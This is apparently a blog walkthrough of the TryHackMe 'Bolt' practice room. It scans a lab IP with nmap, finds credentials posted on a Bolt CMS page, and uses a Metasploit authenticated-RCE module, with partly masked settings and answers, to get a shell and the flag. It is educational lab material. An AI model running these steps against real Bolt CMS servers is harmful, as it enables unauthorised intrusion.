Try Hack Me: Bolt

The skills to be tested and needed to solve this room are: RCE, Metasploit, and just a keen eye.

This room was released today 8/12/2020, and I wanted to try if I can crack it. This is a super easy room. Perfect for anyone who wants to try ctf or hacking.

I also chose to mask part of the answers so you will have to do the steps and see how things work. I don’t want to take away this learning experience from you.

Shoutout to @0x9747 for creating the room. You can access the room at https://tryhackme.com/room/bolt

I was assigned an IP address of 10.10.40.194

There are 8 tasks to complete the room:

  • What port number has the web server with a CMS running?
    • 8***
  • What is the username we can find in the CMS?
    • b***
  • What is the password we can find for the username?
    • b**********3
  • What version of the CMS is installed on the server?
    • B*** *.*.*
  • There’s an exploit for a previous version of this CMS, which allows authenticated RCE. Find it on Exploit DB. What is it’s EDB-ID?
    • 4****
  • Metasploit recently added an exploit module for this vulnerability. What’s the full path for this exploit?
    • exploit/****/******/****_*************_***
  • Set the LHOST, LPORT, RHOSTS, USERNAME, PASSWORD in msfconsole
    • No answer needed
  • Look for the flag.txt inside the machine
    • HTM{w**_******_*****_****_*****?}

Steps:

  1. Deploy the machine

2. Scan the victim machine for any open ports and services using nmap. nmap -sC -sV -oA Desktop/TryHackMe/Bolt 10.10.40.194

  • -sC – to scan using the default nmap scripts
  • -sV – to pull version information of open ports found during the scan
  • -oA Desktop/TryHackMe/Bolt – to save the results of the scan to a file named “bounty” and saved in three different formats (normal, XML, and grepable)
Nmap scan result
  • There are 3 open ports, but let’s check both port 80 and 8*** respectively
  • There is nothing to interesting with the page on port 80, it is just the default Apache welcome page.
  • However, port 8*** is setup with Bolt CMS

3. Let’s look around the different pages and links and check if there are useful information we can use to exploit this web server. The following 2 screenshots contain information to exploit the CMS.

  • I don’t know about you guys, but this Jake, the admin needs to be fired ASAP. I mean, who in their right mind would post their username and password on a publicly accessible page??? Good thing this is just for practice and for fun, lol.

4. Browse to https://www.exploit-db.com and search for bolt in the search field.

Search results for bolt in Exploit DB
The EDB-ID

5. Open Metasploit. msfconsole

6. Type search bolt to look for the metasploit module that we can use to exploit the machine.

There are two results

7. Type Use 1 to load the second module and use it, and type show options to check what parameters/settings need to be set up

8. Set up the following:

  • set RHOSTS 10.10.40.194 – this is to set up the target machine using its IP address
  • set LHOST 10.2.*.* – this is your attack machine’s IP address
  • set USERNAME b*** – the username we found on the webpage
  • set PASSWORD b**********3 – the password posted on the webpage

9. Type exploit or run to start the exploit against the CMS running on the target machine.

  • Above, we can see that we are inside /home/bolt/public/files directory

10. Look for flag.txt. The flag is in the /home directory

Flag found!

Hope you enjoyed the walk-through. Please share and subscribe to my blog! Mahalos!

Published by lightkunyagami

https://tryhackme.com/badge/18276

Leave a comment

Please log in using one of these methods to post your comment:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

%d bloggers like this: